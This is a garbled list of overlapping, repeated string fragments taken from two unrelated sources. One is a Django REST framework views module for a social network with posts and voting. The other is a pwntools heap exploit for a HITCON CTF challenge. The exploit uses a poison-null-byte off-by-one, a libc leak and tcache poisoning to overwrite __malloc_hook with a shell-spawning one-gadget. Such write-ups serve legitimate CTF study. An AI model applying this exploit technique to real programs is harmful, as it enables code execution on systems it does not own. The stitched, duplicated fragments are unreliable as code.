"serializer_class = ProfileSerializer class PostViewSet(viewsets.ModelViewSet): \"\"\"Get or create Posts. retrieve: Return a post", "import api_view, detail_route from rest_framework.response import Response from rest_framework.reverse import reverse from .models", "the logged-in user.\"\"\" serializer.save(owner=self.request.user.profile) @detail_route(methods=['POST', 'DELETE'], url_path='vote') def vote(self, request, pk=None): \"\"\"Vote or", "elif request.method == 'DELETE': Vote.objects.filter(profile=self.request.user.profile, post=post).delete() data = PostSerializer(post, context={'request': self.request}).data return Response(data)", "functionality for Profiles.\"\"\" queryset = Profile.objects.all() serializer_class = ProfileSerializer class PostViewSet(viewsets.ModelViewSet): \"\"\"Get or", "list: Get a paginated list of all Posts. 
create: Create a new Post", "from rest_framework.response import Response from rest_framework.reverse import reverse from .models import Profile, Post,", "from .serializers import ProfileSerializer, PostSerializer @api_view(['GET']) def api_root(request, format=None): \"\"\"Root of API, this", "the vote already exists, if so don't allow the user to vote again", "if Vote.objects.filter(profile=self.request.user.profile, post=post).exists(): # the user already voted, just return the post directly", "serializer_class = PostSerializer def perform_create(self, serializer): \"\"\"Create a Post associated with the logged-in", "import viewsets from rest_framework.decorators import api_view, detail_route from rest_framework.response import Response from rest_framework.reverse", "given its ID. list: Get a paginated list of all Posts. create: Create", "api_view, detail_route from rest_framework.response import Response from rest_framework.reverse import reverse from .models import", "post given its ID. list: Get a paginated list of all Posts. create:", "logged-in user. \"\"\" queryset = Post.objects.all().order_by('-created') serializer_class = PostSerializer def perform_create(self, serializer): \"\"\"Create", "its ID. list: Get a paginated list of all Posts. create: Create a", "user to vote again if Vote.objects.filter(profile=self.request.user.profile, post=post).exists(): # the user already voted, just", "def perform_create(self, serializer): \"\"\"Create a Post associated with the logged-in user.\"\"\" serializer.save(owner=self.request.user.profile) @detail_route(methods=['POST',", "pk=None): \"\"\"Vote or unvote on a post.\"\"\" post = self.get_object() if request.method ==", "from rest_framework.decorators import api_view, detail_route from rest_framework.response import Response from rest_framework.reverse import reverse", "for social_network.\"\"\" from rest_framework import viewsets from rest_framework.decorators import api_view, detail_route from rest_framework.response", "import Profile, Post, Vote from .serializers import ProfileSerializer, PostSerializer @api_view(['GET']) def api_root(request, format=None):", "import reverse from .models import Profile, Post, Vote from .serializers import ProfileSerializer, PostSerializer", "return the post directly data = PostSerializer(post, context={'request': self.request}).data return Response(data) new_vote =", "Create a new Post as the logged-in user. 
\"\"\" queryset = Post.objects.all().order_by('-created') serializer_class", "= self.get_object() if request.method == 'POST': # check if the vote already exists,", "of API, this is useful for documentation generated by DRF.\"\"\" return Response({ 'profiles':", "request=request, format=format) }) class ProfileViewSet(viewsets.ReadOnlyModelViewSet): \"\"\"This provides get and list functionality for Profiles.\"\"\"", "ProfileSerializer, PostSerializer @api_view(['GET']) def api_root(request, format=None): \"\"\"Root of API, this is useful for", "for documentation generated by DRF.\"\"\" return Response({ 'profiles': reverse('profile-list', request=request, format=format), 'posts': reverse('post-list',", "Post, Vote from .serializers import ProfileSerializer, PostSerializer @api_view(['GET']) def api_root(request, format=None): \"\"\"Root of", "views for social_network.\"\"\" from rest_framework import viewsets from rest_framework.decorators import api_view, detail_route from", "Post associated with the logged-in user.\"\"\" serializer.save(owner=self.request.user.profile) @detail_route(methods=['POST', 'DELETE'], url_path='vote') def vote(self, request,", "don't allow the user to vote again if Vote.objects.filter(profile=self.request.user.profile, post=post).exists(): # the user", "format=format), 'posts': reverse('post-list', request=request, format=format) }) class ProfileViewSet(viewsets.ReadOnlyModelViewSet): \"\"\"This provides get and list", "ProfileSerializer class PostViewSet(viewsets.ModelViewSet): \"\"\"Get or create Posts. retrieve: Return a post given its", "api_root(request, format=None): \"\"\"Root of API, this is useful for documentation generated by DRF.\"\"\"", "class ProfileViewSet(viewsets.ReadOnlyModelViewSet): \"\"\"This provides get and list functionality for Profiles.\"\"\" queryset = Profile.objects.all()", "Profile, Post, Vote from .serializers import ProfileSerializer, PostSerializer @api_view(['GET']) def api_root(request, format=None): \"\"\"Root", "PostSerializer @api_view(['GET']) def api_root(request, format=None): \"\"\"Root of API, this is useful for documentation", "format=format) }) class ProfileViewSet(viewsets.ReadOnlyModelViewSet): \"\"\"This provides get and list functionality for Profiles.\"\"\" queryset", "if so don't allow the user to vote again if Vote.objects.filter(profile=self.request.user.profile, post=post).exists(): #", "associated with the logged-in user.\"\"\" serializer.save(owner=self.request.user.profile) @detail_route(methods=['POST', 'DELETE'], url_path='vote') def vote(self, request, pk=None):", "allow the user to vote again if Vote.objects.filter(profile=self.request.user.profile, post=post).exists(): # the user already", "= PostSerializer def perform_create(self, serializer): \"\"\"Create a Post associated with the logged-in user.\"\"\"", "Profile.objects.all() serializer_class = ProfileSerializer class PostViewSet(viewsets.ModelViewSet): \"\"\"Get or create Posts. 
retrieve: Return a", "so don't allow the user to vote again if Vote.objects.filter(profile=self.request.user.profile, post=post).exists(): # the", "\"\"\" queryset = Post.objects.all().order_by('-created') serializer_class = PostSerializer def perform_create(self, serializer): \"\"\"Create a Post", "check if the vote already exists, if so don't allow the user to", "@detail_route(methods=['POST', 'DELETE'], url_path='vote') def vote(self, request, pk=None): \"\"\"Vote or unvote on a post.\"\"\"", "\"\"\"This provides get and list functionality for Profiles.\"\"\" queryset = Profile.objects.all() serializer_class =", "for Profiles.\"\"\" queryset = Profile.objects.all() serializer_class = ProfileSerializer class PostViewSet(viewsets.ModelViewSet): \"\"\"Get or create", "Response({ 'profiles': reverse('profile-list', request=request, format=format), 'posts': reverse('post-list', request=request, format=format) }) class ProfileViewSet(viewsets.ReadOnlyModelViewSet): \"\"\"This", "list functionality for Profiles.\"\"\" queryset = Profile.objects.all() serializer_class = ProfileSerializer class PostViewSet(viewsets.ModelViewSet): \"\"\"Get", "Response from rest_framework.reverse import reverse from .models import Profile, Post, Vote from .serializers", "format=None): \"\"\"Root of API, this is useful for documentation generated by DRF.\"\"\" return", "is useful for documentation generated by DRF.\"\"\" return Response({ 'profiles': reverse('profile-list', request=request, format=format),", "import Response from rest_framework.reverse import reverse from .models import Profile, Post, Vote from", "reverse('post-list', request=request, format=format) }) class ProfileViewSet(viewsets.ReadOnlyModelViewSet): \"\"\"This provides get and list functionality for", "vote again if Vote.objects.filter(profile=self.request.user.profile, post=post).exists(): # the user already voted, just return the", "rest_framework.response import Response from rest_framework.reverse import reverse from .models import Profile, Post, Vote", "\"\"\"Vote or unvote on a post.\"\"\" post = self.get_object() if request.method == 'POST':", "user already voted, just return the post directly data = PostSerializer(post, context={'request': self.request}).data", "post=post).exists(): # the user already voted, just return the post directly data =", "rest_framework import viewsets from rest_framework.decorators import api_view, detail_route from rest_framework.response import Response from", "vote(self, request, pk=None): \"\"\"Vote or unvote on a post.\"\"\" post = self.get_object() if", "useful for documentation generated by DRF.\"\"\" return Response({ 'profiles': reverse('profile-list', request=request, format=format), 'posts':", "Vote(profile=self.request.user.profile, post=post) new_vote.save() elif request.method == 'DELETE': Vote.objects.filter(profile=self.request.user.profile, post=post).delete() data = PostSerializer(post, context={'request':", "the logged-in user. \"\"\" queryset = Post.objects.all().order_by('-created') serializer_class = PostSerializer def perform_create(self, serializer):", "the user already voted, just return the post directly data = PostSerializer(post, context={'request':", "Posts. retrieve: Return a post given its ID. list: Get a paginated list", "a paginated list of all Posts. create: Create a new Post as the", "retrieve: Return a post given its ID. 
list: Get a paginated list of", "queryset = Profile.objects.all() serializer_class = ProfileSerializer class PostViewSet(viewsets.ModelViewSet): \"\"\"Get or create Posts. retrieve:", "rest_framework.reverse import reverse from .models import Profile, Post, Vote from .serializers import ProfileSerializer,", "url_path='vote') def vote(self, request, pk=None): \"\"\"Vote or unvote on a post.\"\"\" post =", "\"\"\"Get or create Posts. retrieve: Return a post given its ID. list: Get", "API, this is useful for documentation generated by DRF.\"\"\" return Response({ 'profiles': reverse('profile-list',", "'posts': reverse('post-list', request=request, format=format) }) class ProfileViewSet(viewsets.ReadOnlyModelViewSet): \"\"\"This provides get and list functionality", "request=request, format=format), 'posts': reverse('post-list', request=request, format=format) }) class ProfileViewSet(viewsets.ReadOnlyModelViewSet): \"\"\"This provides get and", "request, pk=None): \"\"\"Vote or unvote on a post.\"\"\" post = self.get_object() if request.method", "provides get and list functionality for Profiles.\"\"\" queryset = Profile.objects.all() serializer_class = ProfileSerializer", "to vote again if Vote.objects.filter(profile=self.request.user.profile, post=post).exists(): # the user already voted, just return", "Vote from .serializers import ProfileSerializer, PostSerializer @api_view(['GET']) def api_root(request, format=None): \"\"\"Root of API,", "\"\"\"Root of API, this is useful for documentation generated by DRF.\"\"\" return Response({", "detail_route from rest_framework.response import Response from rest_framework.reverse import reverse from .models import Profile,", "on a post.\"\"\" post = self.get_object() if request.method == 'POST': # check if", "from .models import Profile, Post, Vote from .serializers import ProfileSerializer, PostSerializer @api_view(['GET']) def", "Post.objects.all().order_by('-created') serializer_class = PostSerializer def perform_create(self, serializer): \"\"\"Create a Post associated with the", "viewsets from rest_framework.decorators import api_view, detail_route from rest_framework.response import Response from rest_framework.reverse import", "= Vote(profile=self.request.user.profile, post=post) new_vote.save() elif request.method == 'DELETE': Vote.objects.filter(profile=self.request.user.profile, post=post).delete() data = PostSerializer(post,", "with the logged-in user.\"\"\" serializer.save(owner=self.request.user.profile) @detail_route(methods=['POST', 'DELETE'], url_path='vote') def vote(self, request, pk=None): \"\"\"Vote", "# the user already voted, just return the post directly data = PostSerializer(post,", "user. \"\"\" queryset = Post.objects.all().order_by('-created') serializer_class = PostSerializer def perform_create(self, serializer): \"\"\"Create a", "context={'request': self.request}).data return Response(data) new_vote = Vote(profile=self.request.user.profile, post=post) new_vote.save() elif request.method == 'DELETE':", "Posts. create: Create a new Post as the logged-in user. \"\"\" queryset =", ".models import Profile, Post, Vote from .serializers import ProfileSerializer, PostSerializer @api_view(['GET']) def api_root(request,", "if request.method == 'POST': # check if the vote already exists, if so", "from rest_framework.reverse import reverse from .models import Profile, Post, Vote from .serializers import", "create Posts. retrieve: Return a post given its ID. 
list: Get a paginated", "PostSerializer def perform_create(self, serializer): \"\"\"Create a Post associated with the logged-in user.\"\"\" serializer.save(owner=self.request.user.profile)", "already exists, if so don't allow the user to vote again if Vote.objects.filter(profile=self.request.user.profile,", "== 'POST': # check if the vote already exists, if so don't allow", "Return a post given its ID. list: Get a paginated list of all", "of all Posts. create: Create a new Post as the logged-in user. \"\"\"", "def api_root(request, format=None): \"\"\"Root of API, this is useful for documentation generated by", "by DRF.\"\"\" return Response({ 'profiles': reverse('profile-list', request=request, format=format), 'posts': reverse('post-list', request=request, format=format) })", "= PostSerializer(post, context={'request': self.request}).data return Response(data) new_vote = Vote(profile=self.request.user.profile, post=post) new_vote.save() elif request.method", "self.request}).data return Response(data) new_vote = Vote(profile=self.request.user.profile, post=post) new_vote.save() elif request.method == 'DELETE': Vote.objects.filter(profile=self.request.user.profile,", "a Post associated with the logged-in user.\"\"\" serializer.save(owner=self.request.user.profile) @detail_route(methods=['POST', 'DELETE'], url_path='vote') def vote(self,", "# check if the vote already exists, if so don't allow the user", "the post directly data = PostSerializer(post, context={'request': self.request}).data return Response(data) new_vote = Vote(profile=self.request.user.profile,", "post.\"\"\" post = self.get_object() if request.method == 'POST': # check if the vote", "= Post.objects.all().order_by('-created') serializer_class = PostSerializer def perform_create(self, serializer): \"\"\"Create a Post associated with", "request.method == 'POST': # check if the vote already exists, if so don't", "vote already exists, if so don't allow the user to vote again if" ]
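# A minimal routing sketch (assumed; the project's actual urls.py is not shown):
# registering the viewsets on a DRF router is what generates the 'profile-list'
# and 'post-list' URL names that api_root() reverses, and it also routes the
# @detail_route 'vote' action to posts/<pk>/vote/. The module path and names
# below are hypothetical.
from rest_framework.routers import DefaultRouter

from . import views  # assumed module containing the viewsets above

router = DefaultRouter()
router.register(r'profiles', views.ProfileViewSet)
router.register(r'posts', views.PostViewSet)

urlpatterns = router.urls
# Note: DefaultRouter serves its own browsable root view at '', so a project
# that wants the custom api_root above would typically use SimpleRouter and
# wire api_root at '^$' instead.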
[ "new_heap(size, data, attack=False): p.sendlineafter('Your choice: ', '1') p.sendlineafter('Size:', str(size)) if attack: return p.sendafter('Data:',", "this causes strcpy writes null byte at the end of buffer. # when", "big chunk will be put in the unsorted bin delete_heap(2) # table[1] =>", "# therefore, we have a overlapping free chunk with chunk_1 # the resulting", "at the head of the list, this allocation returns it # then, we", "(0x71) # this will allocate chunk_5 exactly in the same place as chunk_1", "=> chunk_1 (0x71) new_heap(0x68, 'b' * 0x67) # table[2] => chunk_2 (0x601) new_heap(0x5f0,", "they are pointing to the same address delete_heap(0) delete_heap(2) # we can create", "table[0] => chunk_1 (0x71) # this causes strcpy writes null byte at the", "print 'libc base: {}'.format(hex(libc_base)) # table[2] => chunk_5 (0x71) # this will allocate", "* 0x507) # viwing chunk_1 will leak libc address show_heap(0) libc_addr = p.recvuntil('\\n$$')[:-3]", "which is due to double free # freeing chunk_1 and chunk_5 put them", "chunks with the top chunk new_heap(0x20, 'd' * 0x20) # we need to", "the tcache new_heap(0x68, 'h' * 0x67) ''' 0x4f322 execve(\"/bin/sh\", rsp+0x40, environ) constraints: [rsp+0x40]", "=> chunk_3 (0x31) # this chunk is for preventing consolidation of previous #", "Therefore, we clear PREV_IN_USE bit. new_heap(0x68 - i, 'b' * (0x68 - i))", "end of buffer. # when i == 0, off-by-one happens and turn size", "(0x71) # we used tcache_poisoning here # chunk_5 will be served from tcache", "the next new_heap call delete_heap(0) # table[0] => chunk_1 (0x71) # this set", "we can create a fake chunk before __malloc_hook with size of 0x7f malloc_hook", "PREV_IN_USE bit. new_heap(0x68 - i, 'b' * (0x68 - i)) # we need", "the chunk_1 multiple times with different sizes # interestingly, it always have chunk", "p.sendline() def show_heap(index): p.sendlineafter('Your choice: ', '2') p.sendlineafter('Index:', str(index)) def delete_heap(index): p.sendlineafter('Your choice:", "same bin in tcache # even though they are pointing to the same", "malloc_hook = libc_base + 0x3ebc30 fake_chunk = malloc_hook - 0x13 print 'fake chunk:", "only cares # about the input size for i in range(9): # table[0]", "''' 0x4f322 execve(\"/bin/sh\", rsp+0x40, environ) constraints: [rsp+0x40] == NULL ''' # table[6] =>", "free a chunk, programs writes 0xDA to the whole chunk # so, we", "=> chunk_1 (0x71) # this set the prev_size field of chunk_2 new_heap(0x68, 'b'", "allocate chunk_5 exactly in the same place as chunk_1 new_heap(0x68, 'f' * 0x67)", "chunk_1, so we can re-allocate it again # in order to launch off-by-one", "__malloc_hook with size of 0x7f malloc_hook = libc_base + 0x3ebc30 fake_chunk = malloc_hook", "field of chunk_2 new_heap(0x68, 'b' * 0x60 + p64(0x580)) # when we free", "the head of the list, this allocation returns it # then, we overwrite", "# when we free chunk_2, it consolidates with chunk_0 # therefore, we have", "+ '\\x00' * (8 - len(libc_addr))) - 0x3ebca0 print 'libc base: {}'.format(hex(libc_base)) #", "set the prev_size field of chunk_2 new_heap(0x68, 'b' * 0x60 + p64(0x580)) #", "table[0] => chunk_1 (0x71) # this set the prev_size field of chunk_2 new_heap(0x68,", "when i == 0, off-by-one happens and turn size of chunk_2 from #", "them in the same bin in tcache # even though they are pointing", "allocation returns it # then, we overwrite __malloc_hook with one gadget new_heap(0x68, 'i'", "fields new_heap(0x508, 'e' * 0x507) # viwing chunk_1 will leak libc address show_heap(0)", 
"and put fake chunk address in the tcache new_heap(0x68, 'h' * 0x67) '''", "chunk_1 # the resulting big chunk will be put in the unsorted bin", "chunk_5 exactly in the same place as chunk_1 new_heap(0x68, 'f' * 0x67) #", "chunk before __malloc_hook with size of 0x7f malloc_hook = libc_base + 0x3ebc30 fake_chunk", "'b' * 0x60 + p64(0x580)) # when we free chunk_2, it consolidates with", "= libc_base + 0x3ebc30 fake_chunk = malloc_hook - 0x13 print 'fake chunk: {}'.format(hex(fake_chunk))", "p.sendlineafter('Your choice: ', '1') p.sendlineafter('Size:', str(size)) if attack: return p.sendafter('Data:', data) if len(data)", "'./libc-2.27.so'}) # table[0] => chunk_0 (0x511) new_heap(0x500, 'a' * 0x4ff) # table[1] =>", "# we need to delete chunk_1, so we can re-allocate it again #", "p = remote('192.168.127.12', 8763) p = process('./program', env = {'LD_PRELOAD': './libc-2.27.so'}) # table[0]", "address delete_heap(0) delete_heap(2) # we can create a fake chunk before __malloc_hook with", "we used tcache_dup attack here which is due to double free # freeing", "chunk with chunk_1 # the resulting big chunk will be put in the", "execve(\"/bin/sh\", rsp+0x40, environ) constraints: [rsp+0x40] == NULL ''' # table[6] => fake_chunk (0x7f)", "unsorted bin delete_heap(2) # table[1] => chunk_4 (0x511) # this will use the", "order to launch off-by-one (poison-null-byte) attack delete_heap(1) # chunk_0 should we freed so", "(8 - len(libc_addr))) - 0x3ebca0 print 'libc base: {}'.format(hex(libc_base)) # table[2] => chunk_5", "# table[0] => chunk_1 (0x71) # this set the prev_size field of chunk_2", "new_heap(0x68, p64(fake_chunk)) # table[5] => chunk_1 (0x71) # this allocation serves chunk_1 and", "we overwrite __malloc_hook with one gadget new_heap(0x68, 'i' * 0x13 + p64(libc_base +", "here # chunk_5 will be served from tcache and we will put the", "next new_heap call delete_heap(0) # table[0] => chunk_1 (0x71) # this set the", "size of chunk_2 from # 0x601 t0 0x600. 
Therefore, we clear PREV_IN_USE bit.", "interestingly, it always have chunk size of 0x71, but the program only cares", "# the resulting big chunk will be put in the unsorted bin delete_heap(2)", "data, attack=False): p.sendlineafter('Your choice: ', '1') p.sendlineafter('Size:', str(size)) if attack: return p.sendafter('Data:', data)", "attack: return p.sendafter('Data:', data) if len(data) < size: p.sendline() def show_heap(index): p.sendlineafter('Your choice:", "table[2] => chunk_2 (0x601) new_heap(0x5f0, 'c' * 0x5ef) # table[3] => chunk_3 (0x31)", "in the same place as chunk_1 new_heap(0x68, 'f' * 0x67) # we used", "chunk size of 0x71, but the program only cares # about the input", "to free the chunk, so malloc returns it on the next new_heap call", "table[5] => chunk_1 (0x71) # this allocation serves chunk_1 and put fake chunk", "0x3ebc30 fake_chunk = malloc_hook - 0x13 print 'fake chunk: {}'.format(hex(fake_chunk)) # table[4] =>", "i in range(9): # table[0] => chunk_1 (0x71) # this causes strcpy writes", "'d' * 0x20) # we need to delete chunk_1, so we can re-allocate", "# when we free a chunk, programs writes 0xDA to the whole chunk", "u64(libc_addr + '\\x00' * (8 - len(libc_addr))) - 0x3ebca0 print 'libc base: {}'.format(hex(libc_base))", "size of 0x7f malloc_hook = libc_base + 0x3ebc30 fake_chunk = malloc_hook - 0x13", "we free a chunk, programs writes 0xDA to the whole chunk # so,", "=> chunk_1 (0x71) # this causes strcpy writes null byte at the end", "p.sendlineafter('Your choice: ', '3') p.sendlineafter('Index:', str(index)) with context.quiet: # hitcon{l4st_rem41nd3r_1s_v3ry_us3ful} # p =", "we free chunk_2, it consolidates with chunk_0 # therefore, we have a overlapping", "double free # freeing chunk_1 and chunk_5 put them in the same bin", "# about the input size for i in range(9): # table[0] => chunk_1", "# this chunk is for preventing consolidation of previous # chunks with the", "later delete_heap(0) # when we free a chunk, programs writes 0xDA to the", "chunk # so, we need to zero out some parts of the chunk_1.", "causes strcpy writes null byte at the end of buffer. # when i", "tcache_dup attack here which is due to double free # freeing chunk_1 and", "+ p64(0x580)) # when we free chunk_2, it consolidates with chunk_0 # therefore,", "= malloc_hook - 0x13 print 'fake chunk: {}'.format(hex(fake_chunk)) # table[4] => chunk_5 (0x71)", "this allocation serves chunk_1 and put fake chunk address in the tcache new_heap(0x68,", "this will allocate chunk_5 exactly in the same place as chunk_1 new_heap(0x68, 'f'", "0x600. Therefore, we clear PREV_IN_USE bit. new_heap(0x68 - i, 'b' * (0x68 -", "writes 0xDA to the whole chunk # so, we need to zero out", "with one gadget new_heap(0x68, 'i' * 0x13 + p64(libc_base + 0x4f322)) # this", "t0 0x600. Therefore, we clear PREV_IN_USE bit. 
new_heap(0x68 - i, 'b' * (0x68", "- 0x13 print 'fake chunk: {}'.format(hex(fake_chunk)) # table[4] => chunk_5 (0x71) # we", "environ) constraints: [rsp+0x40] == NULL ''' # table[6] => fake_chunk (0x7f) # since", "new_heap(0x68, 'f' * 0x67) # we used tcache_dup attack here which is due", "< size: p.sendline() def show_heap(index): p.sendlineafter('Your choice: ', '2') p.sendlineafter('Index:', str(index)) def delete_heap(index):", "chunk_5 put them in the same bin in tcache # even though they", "times with different sizes # interestingly, it always have chunk size of 0x71,", "# hitcon{l4st_rem41nd3r_1s_v3ry_us3ful} # p = remote('192.168.127.12', 8763) p = process('./program', env = {'LD_PRELOAD':", "# this causes strcpy writes null byte at the end of buffer. #", "is at the head of the list, this allocation returns it # then,", "different sizes # interestingly, it always have chunk size of 0x71, but the", "# a libc address into chunk_1 fd/bk fields new_heap(0x508, 'e' * 0x507) #", "is for preventing consolidation of previous # chunks with the top chunk new_heap(0x20,", "re-allocate it again # in order to launch off-by-one (poison-null-byte) attack delete_heap(1) #", "address show_heap(0) libc_addr = p.recvuntil('\\n$$')[:-3] libc_base = u64(libc_addr + '\\x00' * (8 -", "(0x511) # this will use the unsorted bin for allocation, and writes #", "size: p.sendline() def show_heap(index): p.sendlineafter('Your choice: ', '2') p.sendlineafter('Index:', str(index)) def delete_heap(index): p.sendlineafter('Your", "we clear PREV_IN_USE bit. new_heap(0x68 - i, 'b' * (0x68 - i)) #", "new_heap(0x68, 'b' * 0x67) # table[2] => chunk_2 (0x601) new_heap(0x5f0, 'c' * 0x5ef)", "if len(data) < size: p.sendline() def show_heap(index): p.sendlineafter('Your choice: ', '2') p.sendlineafter('Index:', str(index))", "(0x7f) # since fake_chunk is at the head of the list, this allocation", "to double free # freeing chunk_1 and chunk_5 put them in the same", "def new_heap(size, data, attack=False): p.sendlineafter('Your choice: ', '1') p.sendlineafter('Size:', str(size)) if attack: return", "new_heap(0x508, 'e' * 0x507) # viwing chunk_1 will leak libc address show_heap(0) libc_addr", "since fake_chunk is at the head of the list, this allocation returns it", "(poison-null-byte) attack delete_heap(1) # chunk_0 should we freed so it can be consolidated", "parts of the chunk_1. 
Therefore, # we are allocating/freeing the chunk_1 multiple times", "new_heap call delete_heap(0) # table[0] => chunk_1 (0x71) # this set the prev_size", "freeing chunk_1 and chunk_5 put them in the same bin in tcache #", "choice: ', '2') p.sendlineafter('Index:', str(index)) def delete_heap(index): p.sendlineafter('Your choice: ', '3') p.sendlineafter('Index:', str(index))", "chunk_2 (0x601) new_heap(0x5f0, 'c' * 0x5ef) # table[3] => chunk_3 (0x31) # this", "0x3ebca0 print 'libc base: {}'.format(hex(libc_base)) # table[2] => chunk_5 (0x71) # this will", "fd/bk fields new_heap(0x508, 'e' * 0x507) # viwing chunk_1 will leak libc address", "libc address show_heap(0) libc_addr = p.recvuntil('\\n$$')[:-3] libc_base = u64(libc_addr + '\\x00' * (8", "'h' * 0x67) ''' 0x4f322 execve(\"/bin/sh\", rsp+0x40, environ) constraints: [rsp+0x40] == NULL '''", "# we can create a fake chunk before __malloc_hook with size of 0x7f", "#!/usr/bin/env python from pwn import * def new_heap(size, data, attack=False): p.sendlineafter('Your choice: ',", "create a fake chunk before __malloc_hook with size of 0x7f malloc_hook = libc_base", "libc_addr = p.recvuntil('\\n$$')[:-3] libc_base = u64(libc_addr + '\\x00' * (8 - len(libc_addr))) -", "# we used tcache_poisoning here # chunk_5 will be served from tcache and", "free chunk with chunk_1 # the resulting big chunk will be put in", "# in order to launch off-by-one (poison-null-byte) attack delete_heap(1) # chunk_0 should we", "chunk will be put in the unsorted bin delete_heap(2) # table[1] => chunk_4", "bin for allocation, and writes # a libc address into chunk_1 fd/bk fields", "then, we overwrite __malloc_hook with one gadget new_heap(0x68, 'i' * 0x13 + p64(libc_base", "chunk_1 (0x71) # this allocation serves chunk_1 and put fake chunk address in", "with chunk_1 # the resulting big chunk will be put in the unsorted", "to delete chunk_1, so we can re-allocate it again # in order to", "+ 0x3ebc30 fake_chunk = malloc_hook - 0x13 print 'fake chunk: {}'.format(hex(fake_chunk)) # table[4]", "{}'.format(hex(fake_chunk)) # table[4] => chunk_5 (0x71) # we used tcache_poisoning here # chunk_5", "# this allocation serves chunk_1 and put fake chunk address in the tcache", "# we are allocating/freeing the chunk_1 multiple times with different sizes # interestingly,", "chunk_2, it consolidates with chunk_0 # therefore, we have a overlapping free chunk", "* 0x13 + p64(libc_base + 0x4f322)) # this allocation triggers __malloc_hook and we", "it on the next new_heap call delete_heap(0) # table[0] => chunk_1 (0x71) #", "[rsp+0x40] == NULL ''' # table[6] => fake_chunk (0x7f) # since fake_chunk is", "tcache # even though they are pointing to the same address delete_heap(0) delete_heap(2)", "from pwn import * def new_heap(size, data, attack=False): p.sendlineafter('Your choice: ', '1') p.sendlineafter('Size:',", "p.sendlineafter('Index:', str(index)) def delete_heap(index): p.sendlineafter('Your choice: ', '3') p.sendlineafter('Index:', str(index)) with context.quiet: #", "when we free chunk_2, it consolidates with chunk_0 # therefore, we have a", "=> chunk_0 (0x511) new_heap(0x500, 'a' * 0x4ff) # table[1] => chunk_1 (0x71) new_heap(0x68,", "it always have chunk size of 0x71, but the program only cares #", "therefore, we have a overlapping free chunk with chunk_1 # the resulting big", "str(index)) with context.quiet: # hitcon{l4st_rem41nd3r_1s_v3ry_us3ful} # p = remote('192.168.127.12', 8763) p = process('./program',", "address into chunk_1 fd/bk fields new_heap(0x508, 'e' * 0x507) # 
viwing chunk_1 will", "need to zero out some parts of the chunk_1. Therefore, # we are", "we need to free the chunk, so malloc returns it on the next", "when we free a chunk, programs writes 0xDA to the whole chunk #", "the chunk_1's fd. new_heap(0x68, p64(fake_chunk)) # table[5] => chunk_1 (0x71) # this allocation", "put the address of # our fake chunk in the chunk_1's fd. new_heap(0x68,", "Therefore, # we are allocating/freeing the chunk_1 multiple times with different sizes #", "constraints: [rsp+0x40] == NULL ''' # table[6] => fake_chunk (0x7f) # since fake_chunk", "the same bin in tcache # even though they are pointing to the", "in range(9): # table[0] => chunk_1 (0x71) # this causes strcpy writes null", "the unsorted bin for allocation, and writes # a libc address into chunk_1", "p64(0x580)) # when we free chunk_2, it consolidates with chunk_0 # therefore, we", "str(index)) def delete_heap(index): p.sendlineafter('Your choice: ', '3') p.sendlineafter('Index:', str(index)) with context.quiet: # hitcon{l4st_rem41nd3r_1s_v3ry_us3ful}", "from # 0x601 t0 0x600. Therefore, we clear PREV_IN_USE bit. new_heap(0x68 - i,", "to the whole chunk # so, we need to zero out some parts", "* 0x5ef) # table[3] => chunk_3 (0x31) # this chunk is for preventing", "'b' * 0x67) # table[2] => chunk_2 (0x601) new_heap(0x5f0, 'c' * 0x5ef) #", "chunk_1 (0x71) new_heap(0x68, 'b' * 0x67) # table[2] => chunk_2 (0x601) new_heap(0x5f0, 'c'", "chunk_5 (0x71) # this will allocate chunk_5 exactly in the same place as", "we used tcache_poisoning here # chunk_5 will be served from tcache and we", "'i' * 0x13 + p64(libc_base + 0x4f322)) # this allocation triggers __malloc_hook and", "we need to delete chunk_1, so we can re-allocate it again # in", "# when i == 0, off-by-one happens and turn size of chunk_2 from", "', '2') p.sendlineafter('Index:', str(index)) def delete_heap(index): p.sendlineafter('Your choice: ', '3') p.sendlineafter('Index:', str(index)) with", "p.sendafter('Data:', data) if len(data) < size: p.sendline() def show_heap(index): p.sendlineafter('Your choice: ', '2')", "a fake chunk before __malloc_hook with size of 0x7f malloc_hook = libc_base +", "choice: ', '1') p.sendlineafter('Size:', str(size)) if attack: return p.sendafter('Data:', data) if len(data) <", "# table[1] => chunk_1 (0x71) new_heap(0x68, 'b' * 0x67) # table[2] => chunk_2", "# table[2] => chunk_2 (0x601) new_heap(0x5f0, 'c' * 0x5ef) # table[3] => chunk_3", "free # freeing chunk_1 and chunk_5 put them in the same bin in", "# our fake chunk in the chunk_1's fd. new_heap(0x68, p64(fake_chunk)) # table[5] =>", "'2') p.sendlineafter('Index:', str(index)) def delete_heap(index): p.sendlineafter('Your choice: ', '3') p.sendlineafter('Index:', str(index)) with context.quiet:", "# table[0] => chunk_0 (0x511) new_heap(0x500, 'a' * 0x4ff) # table[1] => chunk_1", "we are allocating/freeing the chunk_1 multiple times with different sizes # interestingly, it", "tcache_poisoning here # chunk_5 will be served from tcache and we will put", "chunk_0 (0x511) new_heap(0x500, 'a' * 0x4ff) # table[1] => chunk_1 (0x71) new_heap(0x68, 'b'", "tcache new_heap(0x68, 'h' * 0x67) ''' 0x4f322 execve(\"/bin/sh\", rsp+0x40, environ) constraints: [rsp+0x40] ==", "freed so it can be consolidated with chunk_2 later delete_heap(0) # when we", "zero out some parts of the chunk_1. 
Therefore, # we are allocating/freeing the", "and chunk_5 put them in the same bin in tcache # even though", "the whole chunk # so, we need to zero out some parts of", "(0x68 - i)) # we need to free the chunk, so malloc returns", "'c' * 0x5ef) # table[3] => chunk_3 (0x31) # this chunk is for", "we can re-allocate it again # in order to launch off-by-one (poison-null-byte) attack", "chunk in the chunk_1's fd. new_heap(0x68, p64(fake_chunk)) # table[5] => chunk_1 (0x71) #", "p.sendlineafter('Index:', str(index)) with context.quiet: # hitcon{l4st_rem41nd3r_1s_v3ry_us3ful} # p = remote('192.168.127.12', 8763) p =", "new_heap(0x68 - i, 'b' * (0x68 - i)) # we need to free", "put fake chunk address in the tcache new_heap(0x68, 'h' * 0x67) ''' 0x4f322", "p64(fake_chunk)) # table[5] => chunk_1 (0x71) # this allocation serves chunk_1 and put", "are allocating/freeing the chunk_1 multiple times with different sizes # interestingly, it always", "print 'fake chunk: {}'.format(hex(fake_chunk)) # table[4] => chunk_5 (0x71) # we used tcache_poisoning", "- i)) # we need to free the chunk, so malloc returns it", "consolidated with chunk_2 later delete_heap(0) # when we free a chunk, programs writes", "chunk_0 should we freed so it can be consolidated with chunk_2 later delete_heap(0)", "the same address delete_heap(0) delete_heap(2) # we can create a fake chunk before", "rsp+0x40, environ) constraints: 